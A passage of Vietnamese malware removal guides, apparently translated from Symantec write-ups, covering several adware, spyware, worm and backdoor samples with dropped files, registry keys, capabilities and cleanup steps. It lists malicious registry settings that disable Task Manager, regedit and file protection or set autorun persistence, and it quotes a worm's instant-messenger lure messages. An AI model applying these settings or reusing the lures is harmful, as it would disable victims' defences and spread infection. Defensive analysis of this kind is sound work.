HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain"Window Title" = "XPDC OuUuW_YeAh KABA-LOVE With COUNTERPAIN ;-)"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem"DisableRegistryTools" = "1"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem"DisableTaskMgr" = "1"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem"DisableRegistryTools" = "1"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem"DisableTaskMgr" = "1"
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller"DisableMSI" = "1"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem"DisableCMD" = "1"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"NoFolderOptions" = "1"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer"NoFolderOptions" = "1"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvanced"ShowSuperHidden" = "0"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvanced"Hidden" = "2"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvanced"HideFileExt" = "1"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerCabinetState"FullPath" = "1"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerCabinetState"FullPathAddress" = "1"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionSystemFileProtection"ShowPopups" = "0"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon"SFCDisable" = "0xFFFFFF9D"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon"SFCScan" = "0"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon"ReportBootOk" = "0"
HKEY_CURRENT_USERSoftwareMicrosoftCommand Processor"EnableExtensions" = "0"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced"Hidden" = "2"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced"HideFileExt" = "1"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced"ShowSuperHidden" = "0"
HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWindows"load" = "%System%~~~OuUuW_YeAh~~~.exe"
4. Thoát khỏi regedit

Translate Vansuc_nguyen@yahoo.co.uk

Cách diệt Adware.InstallProvider

Cập nhật: July 24, 2007 3:56:00 PM
Kiểu: Adware
Tên: Install Provider
Phiên bản: 1.0.18.0
Những hệ thống bị ảnh hưởng: Windows 98, Windows 95, Windows XP, Windows Me, Windows NT, Windows Server 2003, Windows 2000

Khi nhiễm Trojan sẽ gây ra một số hoạt động sau
Khởi tạo tạo thêm file vào hệ thống
• C:Documents and Settings[CURRENT USER]Cookies[CURRENT USER]@84.243.251[2].txt
• C:Documents and Settings[CURRENT USER]Local SettingsTemp[RANDOM FILE NAME].exe
• C:Documents and Settings[CURRENT USER]Local SettingsTemp[RANDOM FOLDER NAME]Installer.exe
• C:Documents and Settings[CURRENT USER]Local SettingsTemp[RANDOM FOLDER NAME]InstallOptions.dll
• C:Documents and Settings[CURRENT USER]Start MenuProgramsInstall ProviderInstallProvider.url
• C:Program FilesInstall Providerdata.ini
• C:Program FilesInstall ProviderInstall Provider.ico
• C:Program FilesInstall ProviderInstallProvider.dll
• C:Program FilesInstall ProviderInstallProvider.dlldat
Tiếp theo nó sẽ khởi tạo vào trong regedit
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{A9344DE7-59F2-40F8-9AE7-C203B67444DA}
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{A9344DE7-59F2-40F8-9AE7-C203B67444DA}InProcServer32
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{BBA0C39A-46D8-436D-BF53-6FB84997BC6E}
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{BBA0C39A-46D8-436D-BF53-6FB84997BC6E}InprocServer32
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{F93C5BFF-16F9-4DC5-B78C-EC46F896EE56}
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{F93C5BFF-16F9-4DC5-B78C-EC46F896EE56}InprocServer32
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerBrowser Helper Objects{F93C5BFF-16F9-4DC5-B78C-EC46F896EE56}
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallInstall Provider
HKEY_LOCAL_MACHINESOFTWAREMicrosoftDownloadManager
HKEY_LOCAL_MACHINESOFTWAREInstall Provider
HKEY_ALL_USERSSoftwareMicrosoftWindowsCurrentVersionExtStats{A9344DE7-59F2-40F8-9AE7-C203B67444DA}
HKEY_ALL_USERSSoftwareMicrosoftWindowsCurrentVersionExtStats{F93C5BFF-16F9-4DC5-B78C-EC46F896EE56}
HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerDownloadUI: "{BBA0C39A-46D8-436D-BF53-6FB84997BC6E}"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerToolbar{A9344DE7-59F2-40F8-9AE7-C203B67444DA}
HKEY_ALL_USERSSoftwareMicrosoftInternet ExplorerDownloadUI: "{BBA0C39A-46D8-436D-BF53-6FB84997BC6E}"
HKEY_ALL_USERSSoftwareMicrosoftInternet ExplorerToolbarWebBrowser{A9344DE7-59F2-40F8-9AE7-C203B67444DA}
Nó sẽ khởi tạo một thanh công cụ có chức năng tìm kiếm. Khi người dùng mà kick vào link đó thì sẽ tự động dẫn sang một Web site khác
• avsystemcare.com
• drivecleaner.com
Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
1. Click Start > Run.
2. Type regedit
3. Click OK.

Bạn tìm đến khóa sau và xóa nó đi
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{A9344DE7-59F2-40F8-9AE7-C203B67444DA}
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{A9344DE7-59F2-40F8-9AE7-C203B67444DA}InProcServer32
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{BBA0C39A-46D8-436D-BF53-6FB84997BC6E}
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{BBA0C39A-46D8-436D-BF53-6FB84997BC6E}InprocServer32
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{F93C5BFF-16F9-4DC5-B78C-EC46F896EE56}
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{F93C5BFF-16F9-4DC5-B78C-EC46F896EE56}InprocServer32
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerBrowser Helper Objects{F93C5BFF-16F9-4DC5-B78C-EC46F896EE56}
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallInstall Provider
HKEY_LOCAL_MACHINESOFTWAREMicrosoftDownloadManager
HKEY_LOCAL_MACHINESOFTWAREInstall Provider
HKEY_ALL_USERSSoftwareMicrosoftWindowsCurrentVersionExtStats{A9344DE7-59F2-40F8-9AE7-C203B67444DA}
HKEY_ALL_USERSSoftwareMicrosoftWindowsCurrentVersionExtStats{F93C5BFF-16F9-4DC5-B78C-EC46F896EE56}
HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerDownloadUI: "{BBA0C39A-46D8-436D-BF53-6FB84997BC6E}"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerToolbar{A9344DE7-59F2-40F8-9AE7-C203B67444DA}
HKEY_ALL_USERSSoftwareMicrosoftInternet ExplorerDownloadUI: "{BBA0C39A-46D8-436D-BF53-6FB84997BC6E}"
HKEY_ALL_USERSSoftwareMicrosoftInternet ExplorerToolbarWebBrowser{A9344DE7-59F2-40F8-9AE7-C203B67444DA}
4. Thoát khỏi regedit
Translate Vansuc_nguyen@yahoo.co.uk

Cách diệt Spyware.CheaterChecker

Cập nhật: August 16, 2007 2:34:58 PM
Kiểu: Spyware
Những hệ thống bị ảnh hưởng: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Vista, Windows XP

Khi nhiễm Nó sẽ khởi tạo và folder sau
%UserProfile%Start MenuProgramsCheater Checker
Tiếp theo nó sẽ khởi tạo thêm một số file khác
• %System%[RANDOM CHARACTERS][RANDOM FILE NAME 1].dat
• %System%[RANDOM CHARACTERS][RANDOM FILE NAME 2].dat
• %UserProfile%Local SettingsTemp[RANDOM CHARACTERS]InstallOptions.dll
• %UserProfile%Local SettingsTemp[RANDOM CHARACTERS]ioSpecial.ini
• %UserProfile%Local SettingsTemp[RANDOM CHARACTERS]modern-wizard.bmp
• %UserProfile%Local SettingsTemp[RANDOM CHARACTERS]options.ini
• %UserProfile%Local SettingsTemp[RANDOM CHARACTERS]PandoraInstaller.dll
• %UserProfile%Local SettingsTemp[RANDOM CHARACTERS]System.dll
• %System%[RANDOM CHARACTERS].exe
• %System%[RANDOM FILE NAME 1].dll
• %System%[RANDOM FILE NAME 2].dll
• %System%[RANDOM FILE NAME 3].dll
• %UserProfile%Start MenuProgramsCheater CheckerView Recorded Data.lnk
Thêm một số khóa vào regedit
• HKEY_CLASSES_ROOTCLSID[RANDOM CLSID]
• HKEY_CLASSES_ROOTCLSID[RANDOM CLSID]
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonNotify[RANDOM CHARACTERS]
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShellIconOverlayIdentifiers[RANDOM CHARACTERS]


Note: Where [RANDOM CLSID] may be one of the following:
• {70003867-5667-3860-45D8-B32700019E90}
• {9EF15B8F-0FCE-48EA-AC6F-3F64F00E6B4B}
Nó sẽ thêm vào một số thông tin sau
• Screenshots
• Programs used
• Web sites visited
• Keystrokes
• IM conversations
• User activity, e.g. logon/logoff times
• Email activity
• File-sharing network activity
Nó có thể kiểm soát đựoc khi mà người dùng có đặt mật khẩu bảo vệ và có thể điều khiển từ xa thông qua Web.
Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
1. Click Start > Run.
2. Type regedit
3. Click OK.

Bạn tìm đến và xóa khóa sau đi
HKEY_CLASSES_ROOTCLSID[RANDOM CLSID]
HKEY_CLASSES_ROOTCLSID[RANDOM CLSID]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonNotify[RANDOM CHARACTERS]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShellIconOverlayIdentifiers[RANDOM CHARACTERS]

Note: Where [RANDOM CLSID] may be one of the following:
{70003867-5667-3860-45D8-B32700019E90}
{9EF15B8F-0FCE-48EA-AC6F-3F64F00E6B4B}
4. Thoát khỏi regedit

Translate Vansuc_nguyen@yahoo.co.uk

Cách diệt sâu W32.Hauxi

Phát hiện: August 16, 2007
Cập nhật: August 16, 2007 8:19:16 AM
Kiểu: Worm
Có kick thước khoảng : 12,288 bytes
Những hệ thống bị ảnh hưởng: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Vista, Windows XP
Khi nhiễm Worm sẽ gây ra một số hoạt động sau
Khởi tạo thêm một số file vào hệ thống
• [DRIVE LETTER]:AUTORUN.INF
• [DRIVE LETTR]:xiaohao.exe (a copy of the worm)
Tiếp theo nó sẽ lây lan một số file sau và khởi tạo tệp có tên
C:jilu.txt
Tiếp theo nó sẽ khởi tạo vào trong regedit và sẽ chạy cũng mỗi khi Windows bắt đâu khởi động
HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}"stubpath" = "%System%exloroe.exe"
Tiếp theo nó sẽ khởi tạo và chỉnh regedit và sẽ tạo ra một thuộc tính làm ẩn file
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL"CheckedValue" = "0"
Nó sẽ lây lan tất cả các file có đuôi mở rộng sau
• .jsp
• .php
• .aspx
• .asp
• .html
• .htm
Nó sẽ lây lan và link tới một số Web có chứa mà độc

Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
1. Click Start > Run.
2. Type regedit
3. Click OK.

Tìm đến khóa sau và chỉnh sửa
HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}"stubpath" = "%System%exloroe.exe"

4. Khôi phục và chỉnh sửa lại regedit
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL"CheckedValue" = "0"
5. Thoát khỏi Registry Editor.

Translate Vansuc_nguyen@yahoo.co.uk

Cách diệt Spyware.SysDetective

Cập nhật: July 24, 2007 12:01:52 PM
Kiểu: Spyware
Name: Sys Detective+
Version: 2.3.5
Publisher: Indian Shareware Pro
Risk Impact: High
Những hệ thống bị ảnh hưởng: Windows 98, Windows 95, Windows XP, Windows Me, Windows NT, Windows Server 2003, Windows 2000

Khi nhiễm Nó sẽ gây ra một số hoạt động sau
• %ProgramFiles%Sys Detective+file[(DATE)MMDDYYYY][(TIME)HHMMSS].jpg
• %ProgramFiles%Sys Detective+Makecab.exe
• %ProgramFiles%Sys Detective+Manualacehelp.htm
• %ProgramFiles%Sys Detective+Manualactivating.htm
• %ProgramFiles%Sys Detective+Manualadvance.htm
• %ProgramFiles%Sys Detective+Manualautomatic_email.htm
• %ProgramFiles%Sys Detective+Manualcapture.htm
• %ProgramFiles%Sys Detective+Manualcontact_address.htm
• %ProgramFiles%Sys Detective+Manualedit_menu.htm
• %ProgramFiles%Sys Detective+Manualemail_and_ftp_setting.htm
• %ProgramFiles%Sys Detective+Manualexport_to_avi_window.htm
• %ProgramFiles%Sys Detective+Manualfile_menu__save_as.htm
• %ProgramFiles%Sys Detective+Manualfpace.gif
• %ProgramFiles%Sys Detective+Manualhelp_menu.htm
• %ProgramFiles%Sys Detective+Manualindex.htm
• %ProgramFiles%Sys Detective+Manualinstalling.htm
• %ProgramFiles%Sys Detective+Manualkey_logging.htm
• %ProgramFiles%Sys Detective+Manuallicense_information.htm
• %ProgramFiles%Sys Detective+Manualmain_browse_window.htm
• %ProgramFiles%Sys Detective+Manualmenu.htm
• %ProgramFiles%Sys Detective+Manualpcspysoftware_logo.jpg
• %ProgramFiles%Sys Detective+Manualquick_start.htm
• %ProgramFiles%Sys Detective+Manualsecurity.htm
• %ProgramFiles%Sys Detective+Manualslide_show.htm
• %ProgramFiles%Sys Detective+Manualstyle.css
• %ProgramFiles%Sys Detective+Manualtools_menu.htm
• %ProgramFiles%Sys Detective+Manualview_menu.htm
• %ProgramFiles%Sys Detective+Manualwatch_list_window.htm
• %ProgramFiles%Sys Detective+Manualweb_site_monitoring.htm
• %ProgramFiles%Sys Detective+sysd.exe
• %ProgramFiles%Sys Detective+unins000.dat
• %ProgramFiles%Sys Detective+unins000.exe
• %ProgramFiles%Sys Detective+__acelog.ndx
• %System%sd16win.dll
• %System%noaccess.htm
• %System%exclam.bmp
%System%ijl11.dll
• %System%KTKbdHk.dll
• %System%Msmapi32.ocx
Tiếp theo nó sẽ khởi tạo vào trong regedit và sẽ chạy cũng mỗi khi Windows bắt đâu khởi động
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun"regsvc" = "C:Program FilesSys Detective+sysd"

Thêm khóa vào regedit
HKEY_ALL_USERSSoftwareVB and VBA Program Settingssysd
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallSys Detective+_is1
HKEY_CLASSES_ROOTInterface{20C62CA2-15DA-101B-B9A8-444553540000}
HKEY_CLASSES_ROOTInterface{20C62CAD-15DA-101B-B9A8-444553540000}
HKEY_CLASSES_ROOTInterface{F49AC0B0-DF74-11CF-8E74-00A0C90F26F8}
HKEY_CLASSES_ROOTInterface{F49AC0B2-DF74-11CF-8E74-00A0C90F26F8}
HKEY_CLASSES_ROOTMSMAPI.MAPIMessages
HKEY_CLASSES_ROOTMSMAPI.MAPISession

Nó sẽ khởi tạo một số hàm sau
• Take screenshots
• Record keystrokes
• Monitor visited Web sites
• Send this information to remote users by email or FTP
• Close any applications or Web sites that contain certain keywords
• Send an email to remote users when certain keywords are entered on the keyboard

Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
1. Click Start > Run.
2. Type regedit
3. Click OK.

Tìm đến khóa sau và xóa nó đi
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun"regsvc" = "C:Program FilesSys Detective+sysd"
4. Tìm đến khóa sau và xóa nó đi
HKEY_ALL_USERSSoftwareVB and VBA Program Settingssysd
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallSys Detective+_is1
HKEY_CLASSES_ROOTInterface{20C62CA2-15DA-101B-B9A8-444553540000}
HKEY_CLASSES_ROOTInterface{20C62CAD-15DA-101B-B9A8-444553540000}
HKEY_CLASSES_ROOTInterface{F49AC0B0-DF74-11CF-8E74-00A0C90F26F8}
HKEY_CLASSES_ROOTInterface{F49AC0B2-DF74-11CF-8E74-00A0C90F26F8}
HKEY_CLASSES_ROOTMSMAPI.MAPIMessages
HKEY_CLASSES_ROOTMSMAPI.MAPISession
5. Thoát khỏi regedit


Translate Vansuc_nguyen@yahoo.co.uk

Cách diệt sâu Backdoor.Ginwui.F

Phát hiện: August 10, 2007
Cập nhật: August 10, 2007 5:29:49 PM
Kiểu: Trojan
Có kick thước khoảng : 234,112 bytes; 111,104 bytes; 90,112 bytes
Những hệ thống bị ảnh hưởng: Windows 98, Windows 95, Windows XP, Windows Me, Windows NT, Windows Server 2003, Windows 2000

Khi nhiễm Trojan sẽ gây ra một số hoạt động sau
• %Temp% excel.exe
• %Temp%[ORIGINAL FILE NAME].pps
• %System%US2.EXE
• %System%kb20060919.log
• %System%WINFBI32.DLL
Tiếp theo nó sẽ khởi tạo vào regedit
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWindows"AppInit_DLLs" = "%System%WINFBI32.dll"
Nó sử dụng kỹ thuật rootkit để che đấu những file mà nó khởi tạo
Sẽ khởi tạo một host và sau đó tự động kết nối tới Web sau
[http://][REMOVED].7766.org/
Nó sẽ tự sửa đổi thành những hàm sau
• Send types of hard disk drives to the attacker
• Search hard disks for files
• Download and upload files
• Create and remove folders
• Execute commands
• Update the Trojan's registry entries
Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
1. Click Start > Run.
2. Type regedit
3. Click OK.

Tìm đến và xóa đi
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWindows"AppInit_DLLs" = "%System%WINFBI32.dll"
4. Thoát khỏi regedit

Translate Vansuc_nguyen@yahoo.co.uk

Cách diệt sâu W32.Mimbot.A

Phát hiện: August 9, 2007
Cập nhật: August 10, 2007 1:52:38 AM
Kiểu: Worm
Những hệ thống bị ảnh hưởng: Windows 98, Windows 95, Windows XP, Windows Me, Windows NT, Windows Server 2003, Windows 2000

Khi nhiễm Trojan sẽ gây ra một số hoạt động sau
• %Windir%PictureAlbum2007.zip (a zipped copy of the worm)
• %System%prodigys323.dll
Tiếp theo nó sẽ khởi tạo vào trong regedit và sẽ chạy cũng mỗi khi Windows bắt đâu khởi động
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{448BAC42-AABD-42C5-A550-826BF4AF4BB3}InProcServer32"(Default)" = "prodigys323.dll"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionShellServiceObjectDelayLoad"prodigy1" = "{448BAC42-AABD-42C5-A550-826BF4AF4BB3}"
Tiếp theo nó sẽ tự động gửi tới tất cả các lis trong MSN Instant Messenger với nội dung sau và đính kèm file sau
• QuT usted piensa de este cuadro?
• Conseguf a nuevo cuadro de mf la toma una mirada
• algunos cuadros de la semana pasada, consideran si usted tiene gusto en ellos.
• tiene usted visto este picure todavfa?
• Haha, es que usted?
• Debo utilizar este cuadro en msn?
• QuT usted piensa en esto?
• Was denken Sie an diese?
• was denken Sie an dieses picure? ich glaube, daich hSlich schaue :/
• sind hier eine neue Abbildung von mir
• einige Abbildungen von der letzten Woche, sehen, wenn Sie sie m gen
• Haha, diese sind Sie auf dieser Abbildung?
• sollte ich diese Abbildung auf msn benutzen?
• Was denken Sie an dieses?
• Wat denkt u aan dit picure? ik vind ik lelijk kijk
• Een paar beelden van vorige week, zien of houdt u hier van em nieuwe pic van me. :)
• Hebt u dit picure nog gezien?:p
• Hebt u dit picure nog gezien? :p
• Haha, bent u dat op dat beeld? :)
